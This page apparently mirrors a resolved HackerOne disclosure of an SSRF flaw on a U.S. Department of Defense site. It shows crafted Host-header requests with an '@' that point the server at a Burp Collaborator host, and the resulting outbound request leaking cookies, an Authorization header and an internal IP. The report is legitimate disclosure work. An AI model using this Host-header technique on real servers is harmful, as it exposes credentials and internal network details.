Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

SSRF vulnerability on ██████████ leaks internal IP and various sensitive information

Medium
U
U.S. Dept Of Defense
Submitted None
Actions:
View on HackerOne
Reported by alyssa_herrera

Vulnerability Details

Technical details and impact analysis

Server-Side Request Forgery (SSRF)
**Summary:** A server side request forgery vulnerability appears to leak an internal IP address and tries to connect to an attacker controlled host. **Description:** In an normal request on this web page ```GET /HTTP/1.1 Host: www.████████ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: mt=rid=6130; ASPSESSIONIDQABQSQCS=GNPLOPOCDIGPIKHGFMDDBLBG; googtrans=/en/zh-TW Connection: close Upgrade-Insecure-Requests: 1 ``` It will connect to the website as expected but if we use a @ on the host header like this ``` GET / HTTP/1.1 Host: www.█████████:80@██████████.burpcollaborator.net Pragma: no-cache Cache-Control: no-cache, no-transform Connection: close ``` It'll attempt to connect to our website and leak various information. On our server we would see this, ``` GET / HTTP/1.1 Host: ████████.burpcollaborator.net Pragma: no-cache Cache-Control: no-cache, no-transform Cookie: mt=rid=6130; ASPSESSIONIDQABQSQCS=GNPLOPOCDIGPIKHGFMDDBLBG X--------------: 1.1.1.1 Accept-Encoding: gzip, deflate, identity Connection: Keep-Alive Authorization: Basic ████████ X-BlueCoat-Via: 913daace1d652c00 ``` Additionally we will see a DNS look up from this IP, 214.72.0.2 Which I confirmed to be DOD owned ## Impact Medium ## Step-by-step Reproduction Instructions We can reproduce this simply using www.████:[email protected] for the host header and we'll the see the results. As seen below ``` GET / HTTP/1.1 Host: www.████:[email protected] Pragma: no-cache Cache-Control: no-cache, no-transform Connection: close ``` If you have burp suite pro, you can do this easily with burp collaborator ## Product, Version, and Configuration (If applicable) N/a ## Suggested Mitigation/Remediation Actions Refuse attempts to connect to other hosts. ## Impact This will allow attackers to gain access to an internal IP of a DOD website along with other sensitive information that may be leaked with the request

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Server-Side Request Forgery (SSRF)